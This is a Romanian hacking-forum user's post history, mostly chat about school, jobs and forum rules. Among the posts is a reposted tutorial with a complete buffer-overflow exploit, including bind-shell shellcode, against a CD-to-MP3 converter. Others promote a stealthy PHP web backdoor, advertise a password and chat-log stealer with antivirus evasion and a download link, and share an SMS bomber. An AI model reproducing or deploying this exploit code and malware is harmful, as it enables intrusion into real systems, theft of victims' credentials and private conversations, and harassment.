Jump to content

ZeroCold

Active Members
  • Posts

    1376
  • Joined

  • Last visited

  • Days Won

    17

Everything posted by ZeroCold

  1. Acum cateva zile am gasit pe un forum (numai stiu unde, poate aici), un script care face acelasi lucru. @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A Salvati.bat La user bagati ipu.
  2. Aha, am auzit si eu ca e greu, la fel am auzit si cand eram in generala, ca e greu la liceu, acum o sa vad dupa ce termin liceul. (sper sa fie totul ok) Sa continuam discutia despre job-uri...
  3. Aha, multumesc pt sfaturi. Daca eram acu la interviu si ma intrebau exac ce a zis hell eram ca si angajat Chestii de genu "sa mufezi cabluri de net" (ador sa mufez ), sau care e diferenta dintre public, private.. ce face new, stiu si eu... oricum mai am de invatat... // Sa inveti de 9 ca sa iei 6,7... daca tot inveti de 9, de ce sa nu iei 9 :> Oricine poate lua usor 9, trebuie doar sa vrea... eu personal nu am chef, mie lene si nu vreau sa iau 9 ma multumesc cu 6,7 (asa am facut tot liceul) mi-am balansat notele, sa nu fiu nici printre ultimii, nici printre primii, dupa... chef (caterinca, solitare, sah.. poker, muzica... si asa trece anul) Ce vreau si imi place retin, ce nu, nu ma intereseaza. Ideea e ca daca vrei sa faci un lucru, il faci si nu iti poate sta nimeni in cale. Trebuie doar sa vrei.
  4. Util, multumesc. Problema e ca eu stiu anumite chestii dar nu stiu ca le stiu, adica nu sunt sigur pe ele si folosesc google. Nu le stiu pe de rost, dar stiu unde sa le caut. Atatat timp cat am internet stiu sa fac orice (c++, php, visual etc), daca pica netu is = 0. Daca ma intrebi, ce face functia x, habar n-am, dar daca imi zici fa chestia aia si imi lasi google, ti-o fac (intr-un timp mai lung sau mai scurt depinde..., dar o fac ) Eu va trebui sa ma angajez din primul an (parintii nu au de unde sa imi dea...) Am participat la cateva concursuri, dar nu am luat premiu, mentiune...(creare website si desing), am mai facut cisco esentials, acum vreau sa particip la alt concurs, in fine... Ma vor ajuta chestiile astea daca le trec in cv? sau trebuie sa am premii (1,2,3)? Inca o intrebare, sa zicem ca ma mut intr-un oras mai mare, (eu vreau sa ma duc in Bucuresti), imi vor ajunge banii? Cazare (cred ca voi inchiria ceva, probabil o garsoniera.. nu am pretetii poate sa fie cea mai naspa din tara.. sa fie ), mancare si ce mai este? Mersi! //stiu ca am repetat de multe ori cuvantul stiu, asta e, nu mai editez.. scuze
  5. [+]Written By D4rk357 [+]Special thanks to Peter Van Eckhoutte for his awesome Exploit writing series . [+]Thanks to Fb1h2s for helping me out in the way [+]garage4hackers In this tutorial i will start from scratch and build a working exploit. A public exploit for this is already available here Free CD to MP3 Converter 3.1 Buffer Overflow Exploit First step is downloading and installing the vulnerable application from here Application Install Immunity Debugger or ollydbg or windbg anyone of it would do . Now we will write a simple python code which will generate a .wav file and test the application against it . handle=open("crash.wav","a") Crap="\x41"*30000 handle.write(Crap) This little code upon execution will generate a file with the name of crash.wav Open the debugger of your choice in my case immunity debugger . Open the Executable of CD to MP3 converter and then click on execute. Open: Execute: Now open your Crash.wav file in CD to MP3 converter in option wav to wav converter and BOOM the application Dies instantly . NOw check your Debugger for what exactly happened . Woot Woot Eip has been overwritten . Not only EIP but a few more registers have been overwritten thus increasing our chance to make a Working exploit for this vulnerability. Now The next step is to determine the Exact position at which EIP is overwritten . For that We will use a couple of tools which comes with metasploit . On windows Platform Open Cygwin and then browse to tools directory of metasploit. Once inside it execute pattern_create.rb script which generates unique characters of whichever size you want . By reducing the size of crap again and again in my script and getting a crash i figured it out a string of 5000 unique characters will be more than enough. Syntax: ./pattern_create.rb 5000 once the pattern is created copy it and put it in place of Crap . Now Execute the application from debugger again and put in the newly generated Crash.wav(Delete previous Crash.wav file before doing it as i am opening the file in append mode). Check the Debugger again and you can see some numbers in the EIP which in my case is 31684630 Now in Cygwin Shell we will run pattern_offset to check where exactly EIP is being overwritten . Syntax: ./pattern_offset.rb 31684630 5000 And the location it gives me is 4112 great. So Just to Cross Check that the position of EIP given by the tool is correct we will write a small script . handle=open("crash.wav","a") Crap="\x41"*4112 Eip="\x42"*4 handle.write(Crap) Again open the program through immunity debugger Execute it . After the application crashes check the Eip and you find there 42424242 which means the address found by the tool is perfect . Now we have to find the location of a command in dll file which calls/goes to esp like jmp esp etc. Now we will load the the application again in debugger and search jmp esp command in every dll that is being loaded .( In immunity debugger we can take a look at executable module screen and double click on each dll that is being loaded and then search for the specific command in that address space. After some tinkering out we will find that the dll winmm.dll has a jmp esp command at 76B43ADC Great now we have almost everything we need to make a workable exploit . the address 76 B4 3A DC will be mentioned as \xDC \x3A \xB4 \x76 since we are passing it as a string to EIP . We will use win32 bind shell provided by metasploit encoded in alpha2 encoder We will add some NOPS ( no operation bytes) before starting our shellcode because generally some bytes at the starting are not interpreted by processor as command so it could cause our exploit to fail . Adding Nops would increase the reliability of exploit . And we get a telnet connection \m/ [P.S] You will have to write your own exploit(modify EIP) as i used a hard coded address Dont Try Post Mortem degubbing .. Debugger is not catching it ( Atleast in my computer) P.S here's the source Code: handle=open("final.wav","a") Crap="\x41"*4112 Eip="\xDC\x3A\xB4\x76" # win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com ShellCode=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x43" "\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x53\x32\x41\x42\x41\x32" "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x62" "\x4a\x48\x6b\x70\x4d\x38\x68\x6c\x39\x4b\x4f\x79\x6f\x6b\x4f\x73" "\x50\x4c\x4b\x72\x4c\x46\x44\x57\x54\x4e\x6b\x31\x55\x67\x4c\x4e" "\x6b\x63\x4c\x34\x45\x62\x58\x46\x61\x48\x6f\x4e\x6b\x50\x4f\x44" "\x58\x6c\x4b\x51\x4f\x45\x70\x44\x41\x6a\x4b\x70\x49\x6e\x6b\x35" "\x64\x4c\x4b\x53\x31\x78\x6e\x75\x61\x6b\x70\x4f\x69\x6e\x4c\x4b" "\x34\x4f\x30\x53\x44\x57\x77\x6f\x31\x4b\x7a\x74\x4d\x75\x51\x69" "\x52\x68\x6b\x48\x74\x57\x4b\x70\x54\x64\x64\x47\x58\x50\x75\x6d" "\x35\x4c\x4b\x31\x4f\x36\x44\x56\x61\x78\x6b\x63\x56\x6c\x4b\x54" "\x4c\x70\x4b\x4e\x6b\x53\x6f\x75\x4c\x47\x71\x5a\x4b\x63\x33\x54" "\x6c\x4e\x6b\x6b\x39\x30\x6c\x44\x64\x35\x4c\x71\x71\x5a\x63\x34" "\x71\x6b\x6b\x72\x44\x6c\x4b\x37\x33\x76\x50\x4e\x6b\x71\x50\x56" "\x6c\x6c\x4b\x44\x30\x65\x4c\x4c\x6d\x4c\x4b\x77\x30\x35\x58\x61" "\x4e\x62\x48\x6c\x4e\x62\x6e\x44\x4e\x38\x6c\x50\x50\x4b\x4f\x5a" "\x76\x45\x36\x70\x53\x41\x76\x32\x48\x70\x33\x56\x52\x45\x38\x42" "\x57\x72\x53\x34\x72\x63\x6f\x72\x74\x6b\x4f\x78\x50\x72\x48\x38" "\x4b\x58\x6d\x6b\x4c\x65\x6b\x42\x70\x49\x6f\x69\x46\x71\x4f\x6c" "\x49\x6a\x45\x65\x36\x4f\x71\x4a\x4d\x35\x58\x53\x32\x50\x55\x32" "\x4a\x35\x52\x49\x6f\x48\x50\x31\x78\x7a\x79\x36\x69\x4c\x35\x6c" "\x6d\x70\x57\x39\x6f\x6e\x36\x70\x53\x32\x73\x62\x73\x56\x33\x52" "\x73\x73\x73\x52\x73\x33\x73\x30\x53\x6b\x4f\x4a\x70\x35\x36\x75" "\x38\x52\x31\x41\x4c\x61\x76\x50\x53\x4d\x59\x4d\x31\x4d\x45\x55" "\x38\x69\x34\x56\x7a\x42\x50\x5a\x67\x36\x37\x79\x6f\x7a\x76\x61" "\x7a\x76\x70\x66\x31\x73\x65\x39\x6f\x68\x50\x41\x78\x4d\x74\x4e" "\x4d\x76\x4e\x68\x69\x42\x77\x79\x6f\x59\x46\x36\x33\x66\x35\x69" "\x6f\x6e\x30\x45\x38\x4b\x55\x51\x59\x6f\x76\x72\x69\x42\x77\x6b" "\x4f\x4a\x76\x70\x50\x46\x34\x36\x34\x53\x65\x79\x6f\x6e\x30\x6c" "\x53\x65\x38\x4b\x57\x70\x79\x5a\x66\x52\x59\x30\x57\x69\x6f\x6a" "\x76\x30\x55\x59\x6f\x6e\x30\x70\x66\x70\x6a\x53\x54\x72\x46\x62" "\x48\x65\x33\x50\x6d\x6c\x49\x4d\x35\x31\x7a\x52\x70\x70\x59\x44" "\x69\x7a\x6c\x4c\x49\x69\x77\x51\x7a\x71\x54\x4f\x79\x4b\x52\x34" "\x71\x39\x50\x4c\x33\x4d\x7a\x6b\x4e\x71\x52\x44\x6d\x6b\x4e\x37" "\x32\x54\x6c\x4e\x73\x4e\x6d\x33\x4a\x56\x58\x6c\x6b\x6c\x6b\x6e" "\x4b\x53\x58\x64\x32\x69\x6e\x6c\x73\x44\x56\x6b\x4f\x73\x45\x47" "\x34\x4b\x4f\x79\x46\x33\x6b\x42\x77\x73\x62\x30\x51\x73\x61\x72" "\x71\x62\x4a\x33\x31\x42\x71\x50\x51\x72\x75\x50\x51\x49\x6f\x78" "\x50\x71\x78\x4e\x4d\x39\x49\x75\x55\x6a\x6e\x70\x53\x4b\x4f\x59" "\x46\x32\x4a\x4b\x4f\x49\x6f\x56\x57\x69\x6f\x5a\x70\x4e\x6b\x33" "\x67\x49\x6c\x6d\x53\x39\x54\x55\x34\x39\x6f\x4b\x66\x31\x42\x69" "\x6f\x4a\x70\x62\x48\x78\x70\x4d\x5a\x35\x54\x63\x6f\x70\x53\x39" "\x6f\x4e\x36\x39\x6f\x38\x50\x43") nops="\x90"*50 handle.write(Crap+Eip+nops+ShellCode) #Sursa: aici.
  6. This is from SANS tutor Lenny Zeltser, PDF: http://zeltser.com/reverse-malware/intro-to-malware-analysis.pdf Video: http://www.securitytube.net/Introduction-to-Malware-Analysis-video.aspx
  7. This video tour of a Google data center highlights the security and data protections that are in place at our data centers. Video: aici.
  8. Beginners Guide to going Wireless Link: aici
  9. With Weevely you can create and manage PHP trojan designed to be hardly detectable. This software is a proof of concept of an unobtrusive PHP backdoor that simulate a complete telnet-like connection, hidden datas in HTTP referers and using a dynamic probe of system-like functions to bypass PHP security restrictions. Generate PHP code to trojanize a web server, and act like a telnet client to execute commands or inject addictional function on backdoored server. weevely is also included in blackbox linux which we have discussed in detail here. Features of weevely: Coded requests: Communication between backdoor server and client are done via normal HTTP requests, with a plausible fake HTTP_REFERER header field that contains coded commands to hide traffic from NIDS monitoring and HTTP log files review. PHP security bypass: The program try to bypass PHP configurations that disable sensible functions that execute external programs, enabled with the option disable functions located in php.ini. Weevely tries different system function (system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) to find out and use functions enabled on remote server. Tiny server: The backdoor server code is small and easily hideable in other PHP files. The core is dinamically cripted, aim to bypass pattern matching controls. Modularity: Is simple to increment backdoor server feature with modules, injecting PHP code through the backdoor to implement new functionality on remote server. Code and load new modules is really easy. Current additional modules are: check safe mode, read file, download file on remote server, search writable path . Sure looks good to be installed when you have control of a server and want to control it remotely. It is open source, so can be modified in case it is detected by anti-viruses. Download: https://code.google.com/p/weevely/downloads/list #sursa: weevely: A Stealth Tiny PHP Backdoor!
  10. Anti SMS Bomber SMS Bomber DOWNLOAD: http://www25.zippyshare.com/v/15569086/file.html // Le-am instalat pe GT I5500 Galaxy, merg.
  11. E imposibil sa nu fii de acord. Sunt aici tot timpul, am vrut sa ma implic in multe chestii, dar cred ca proiectele au fost abandonate sau nu au avut nevoie de mine in fine. Daca aveti nevoie de mine, sunt aici.
  12. Nu pleca! too short.
  13. Daca as veni la tine acasa si te-as da afara fiindca nu ti-ai facut patul, ar fi corect? Adminul e admin, administrator, sef etc. Nu cred ca este necesara nici o pedeapsa pt el. Moderatorii ar trebui pedepsiti in caz ca gresesc. (parerea mea.) Regula nr 15: Care parte din "are intotdeauna dreptate" nu o intelegi? Eu nu inteleg o chestie, de ce tot timpul se trezesc niste persoane, care abia intra pe forum de 2 - 3 luni, sa comenteze? Stati macar juma de an, si apoi veniti sa faceti pa zmeii. // Dupa ce am citit reply-urile din tread-ul asta si celalat am ajuns la concluzia ca RST Court nu ar trebui creeat. De ce??? Nu merita. Daca primesti ban iti faci alt cont si dai pm unui admin. Warn la fel, dai pm unui admin. Daca esti nevinovat se rezolva, daca nu asta e. Proof: //Asa, totusi... la RST Court ar trebui sa intre doar persoanele care au postat in market si au fost tepuiti (aici ar trebui sa decida juratii si sa se ia masuri). RST Court nu ar trebui sa aibe nici o legatura cu warn-urile / ban-urile, pt asta exista mod si admin. parerea mea.
  14. Microsoft is offering a $250,000 reward for providing information of Rustock botnet. The Rustock botnet is responsible for a great deal of cyber crime, spam (the botnet has capacity for 30 billion spam mails every day), dodgy pharmaceuticals, counterfeit stuff and pirated software. The size of the Rustock botnet has already been cut in half, but that still leaves it with hundreds of thousands of systems under its control. In order to bring down the entire botnet Microsoft is now turning to the legal system. Microsoft Declares If you know about the "Rustock Botnet" , Inform Microsoft and Get $250,000 reward # Microsoft offers $250,000 reward for information of Rustock Botnet ~ THN : The Hacker News
  15. Features: ? Awesome Password Stealers working with latest versions. ? Emails ChatLog Stealers. Now steal conversations from your slaves. - MSN Chat Log Stealer - Skype Chat Log Stealer - Yahoo Chat Log Stealer - Digsby ChatLog Stealer ? Generates Unique output everytime. ? Encryption on your sensitive details. ? Polymorphic Encryption on Strings and variables to keep it fud for longer. (Not fud anymore but you can use a crypter) ? Uses Dynamic API's with polymorphic encryption, which gets difficult for AVs to tag codes as virus. ? Codedom Based. No use of Stubs. ? Melt File. ? Add to Startup. You only need this feature if you want to check for updated passwords everyday on slave's computer. ? Small Server size. ? NO File is dropped, in the temporary folders to arouse suspicion. ? Icon Changer. ? Built in Assembly Editor to change info of server. If not used HCStealer randomizes assembly info itself. ? Spawn Fake Error. ? Building a Server has never been easier than this. Designed to build servers for the most naive users. ? Requires .net framework 2.0 which is available in most PCs. ? Complete UAC Bypass. ? PHP Logging, uses database to store all your fetched passwords. ? Tested and 100% working on Windows 7, XP. 32 bit and 64 bit. Password Stealers : ? Windows Live Messenger all versions. Recovers passwords from Windows Live Messenger all versions including 11. ? Firefox Stealer 3.5, 3.6 and 4.0 + All Betas Recovers passwords from mozilla firefox and decrypts them. It automatically checks for Firefox versions and fetches data automatically. It can recover from Firefox v4.0 betas which not many stealers can. ? Google Chrome Latest Version Recovers passwords from google's Chrome webbrowser. ? Internet Explorer 7,8 Registry Passes It can decrypt passwords from Internet explorer version 7, 8 not yet tested on 9. Also recovers hashes of unsaved passwords. ? Opera Webbrowser Recovers passwords from Opera wand.dat and decrypts them. ? Yahoo ETS Yahoo ETS is yahoo messenger passwords in an encrypted format. Yahoo ETS is impossible to decrypt as supplied by sources, but you can try your luck using it to your benefit. ? Steam Username Steam changed the way passwords were stored before. Now it doesn't save passwords in clientregistry like before. So its difficult to fetch passwords. But HCStealer recovers the Steam Username and this can help you get steam passwords, since most people use same passwords to store along with steam. ? Windows Serial Key Fetches Windows Serial Key and which OS slave is running. ? Pidgin/Gaim Pidgin is an AIO internet messenger, and many people use it. HCStealer fetches passwords from pidgin. ? Paltalk AIO IM which HCStealer fetches passwords from. ? FileZilla A very widely used and famous FTP client, filezilla. HCStealer recovers passwords from Filezilla. ? DynDns A dns client which manages dns of a user. it steals from DynDns. You can get some valuable dns with rats or booter zombies. ? NO-IP version 2 Another dns client which manages dns of a user. HCStealer steals from No-ip v2 client. ? IP Address, OS, PC Name of slave. Fetches information like IP address, operating system, PC name of the slave with each log. ChatLog Stealers : Emails you the "SAVED" chat archives from slave's pc. ? MSN Conversations ? Skype Conversations ? Yahoo Conversations ? Digsby Conversations Download: http://www.multiupload.com/756D6X8ZYD Password: www.hackcommunity.com #sursa hackforums.
  16. Pt asta va exista RST Court. Daca nu ai dovezi, nu-i nimic intri pe rst court si intrebi "Nenea administrator, de ce/ pentru ce mi-ai dat warn/ban? Daca nu are nici el nici o dovata, iti va retrage warn-ul / scoate banul si probabil va fi pedepsit in functie de cum vor decide juratii. Adica daca tu postezi ceva ce pe mine m-a ajutat, sa zicem o lista de email-uri si eu vin si iti zic "Multumesc! mi-a fost de ajutor." sunt offtopic? offtopic != post hunt Pt ca asa este frumos, sa multumesti celor care te ajuta. Bine, nu sa te apuci acu sa faci spam, in fiecare post Multumesc, multumesc, multumesc.. etc. Ai deschis un thread, o cerere, daca te ajuta cineva, mi se pare frumos si civilizat sa ii spui multumesc.
  17. Ratatii astia sunt buni, fac trafic. Acuma mi-a venit o idee, ca sa nu ramana 10 oameni pe forum. Faceti un rang special "La respect" sau ce vreti voi si dati permisiuni doar de read pe forum, fara sa posteze. Si asa avem si trafic si avem si posturi calumea.
  18. ?Mircea Badea comenteaza o manea in direct?? - YouTube Mie dor de tine si mi-e bine langa tine.. )))
  19. Nici nu am citit ce ai mai scris in topic, am vazut titlul si am si zis da. Dupa curatenie o sa imi fac timp sa mai postez si eu cate ceva. O sugestie, inchideti offtopic si penale pt o saptamana sa vedem ce iese. (o saptamana, asa ca experiment.)
  20. Bora-Bora
  21. Am mai vazut google hacks pe aici, asta mi s-a parut mai detaliat de aia l-am postat. // am editat cartile.. (nu le-am obs.)
  22. Renunta la e Bafta! // welcome!
×
×
  • Create New...